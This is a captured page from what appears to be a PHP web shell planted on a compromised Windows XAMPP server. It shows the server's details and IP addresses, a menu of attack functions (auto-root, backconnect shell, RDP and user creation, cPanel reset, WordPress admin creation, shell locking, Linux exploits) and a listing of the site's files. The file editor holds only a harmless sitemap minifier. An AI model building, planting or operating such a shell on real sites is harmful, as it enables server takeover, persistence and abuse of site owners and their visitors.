Windows NT DESKTOP-F6O892L 6.2 build 9200 (Windows 8 Professional Edition) i586
Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.19
: 10.220.0.88 | : 216.73.216.146
Cant Read [ /etc/named.conf ]
5.6.19
SC-SRV
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ D ]
[ E ]
D: /
xampp /
htdocs /
campus /
[ HOME SHELL ]
Name
Size
Permission
Action
bb.php
2.12
KB
-rw-rw-rw-
index.php
119.59
KB
-rw-rw-rw-
lol.txt
359.28
KB
-rw-rw-rw-
p.php
286
B
-rw-rw-rw-
robots.txt
85
B
-rw-rw-rw-
sitemap.min.xml
2.15
MB
-rw-rw-rw-
sitemap1.xml
2.55
MB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : p.php
<?php $source = 'sitemap1.xml'; $minified = 'sitemap.min.xml'; $xml = file_get_contents($source); $min = preg_replace('/>\s+</', '><', $xml); // hapus spasi & newline $min = trim($min); file_put_contents($minified, $min); echo "Sitemap berhasil diminify ke: $minified\n"; ?>
Close